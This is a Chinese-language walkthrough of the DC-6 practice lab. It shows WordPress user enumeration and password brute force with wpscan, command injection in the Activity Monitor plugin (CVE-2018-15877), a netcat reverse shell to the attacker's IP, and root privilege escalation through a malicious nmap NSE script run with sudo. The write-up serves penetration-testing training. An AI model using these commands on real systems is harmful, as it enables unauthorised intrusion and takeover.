DC-6教程

描述

DC-6 是另一个特意建造的易受攻击的实验室，旨在获得渗透测试领域的经验。

这不是一个过于困难的挑战，所以应该非常适合初学者。

此挑战的最终目标是获得 root 权限并读取唯一的标志。

必须具备 Linux 技能和熟悉 Linux 命令行，以及一些基本渗透测试工具的经验。

使用工具

攻击者：kali 192.168.110.4

靶机：DC-6 192.168.1.191

一、信息收集

0x01 查看存活主机和端口

由于主机和靶机不在同一个网段，这里我们直接使用nmap扫描ip地址和端口

nmap -PS 192.168.1.0/24

0x02 查看端口开放的服务

nmap -sV -T4 -O -p 80,22 192.168.1.191

0x03 查看主机指纹信息

whatweb http://192.168.1.191

0x04 访问靶机HTTP服务

发现浏览器找不到此网站（dns无法解析此ip）

添加“192.168.1.191 wordy”到host文件中（“C:\Windows\System32\drivers\etc\hosts”）

同样在kali的/etc/hosts文件下也加上此语句

vim /etc/hosts

在网站内随便点一下

发现这个地方点进去后有登录选项

二、漏洞发现

0x01 用户名枚举

wpscan --url http://wordy/ -e u

0x02 暴力破解用户名口令

将刚刚枚举到的用户名存储在桌面上的文本文档中

vim users.txt

暴力破解

wpscan --url http://wordy/ -U users.txt -P /usr/share/wordlists/rockyou.txt

使用dirb扫描出来管理员登录界面

dirb http://wordy/

打开登录界面输入账号密码登录

发现activity monitor插件

0x03 漏洞信息查询

尝试搜索此插件的漏洞信息

msfconsole
search activity monitor

查找到一个漏洞，查看使用手册

use exploit/unix/webapp/wp_plainview_activity_monitor_rce
show options

01 背景介绍 WordPress 插件Plainview Activity Monitor存在一个远程命令执行漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行。
02 影响范围
Plainview Activity Monitor plugin version <= 20161228
03 利用方式 默认后台
wp-login.php Activity Monitor >tools 用命令执行
04 漏洞序号
CVE-2018-15877

查看漏洞文件

发现这个一个html文件，将html标签复制到一个文件上

vi 45274.html

三、漏洞利用

0x01 命令执行漏洞

尝试拼接命令

ping 192.168.1.191|ls

使用kali监听9999端口

nc -lvvp 9999

在网页框中输入

ping 192.168.110.4| nc -e /bin/bash 192.168.110.4 9999

然后点击Lookup

0x02getshell成功

可以看到我们已经拿到shell

0x03开启终端

python -c ‘import pty;pty.spawn("/bin/bash")’

开启一个python终端

四：提权

0x01查看用户信息

cd 到/home/mark目录下查看文件things-to-do 文档，查看

提示到有用户 graham的口令，尝试su graham切换用户,查看jens用户下文件信息，发现对backups.sh文件具有可执行权限，且以jens用户执行。尝试写入反弹终端命令并执行

查看jens用户下文件信息，发现对backups.sh文件具有可执行权限，且以jens用户执行。尝试写入反弹终端命令并执行

0x02转换身份

echo “/bin/bash” >> backups.sh
sudo -u jens ./backups.sh

尝试以jens身份执行此文件，发现切换成功

0x03 找到提权点

sudo -l 查看用户当前可执行的sudo命令，发现nmap命令执行时以root身份执行，尝试编写提权脚本

echo "os.execute('/bin/bash')">demon.nse

nse为nmap可执行文件后缀，此命令为开启一个终端（以当前身份）

sudo nmap --script=/home/jens/demon.nse

执行此脚本

提权成功

进入到root，找到flag

cat /root/theflag.txt

DC-6总结

hosts定向

wpscan枚举账号(因为是WordPress博客)

wpscan账号密码爆破

dirb目录扫描得到admin登录地址

发现命令注入漏洞

使用burp抓包修改数据反弹shell

打开交互模式 python -c 'import pty;pty.spawn("/bin/bash")'

进入到home目录查看DC-6的用户目录

发现graham账号的密码，进行ssh登录成功

使用sudo -l查看权限

利用命令脚本转换到jens用户

发现可执行root的文件为nmap

创建一个nmap文件执行脚本

只想nmap文件执行脚本获取到root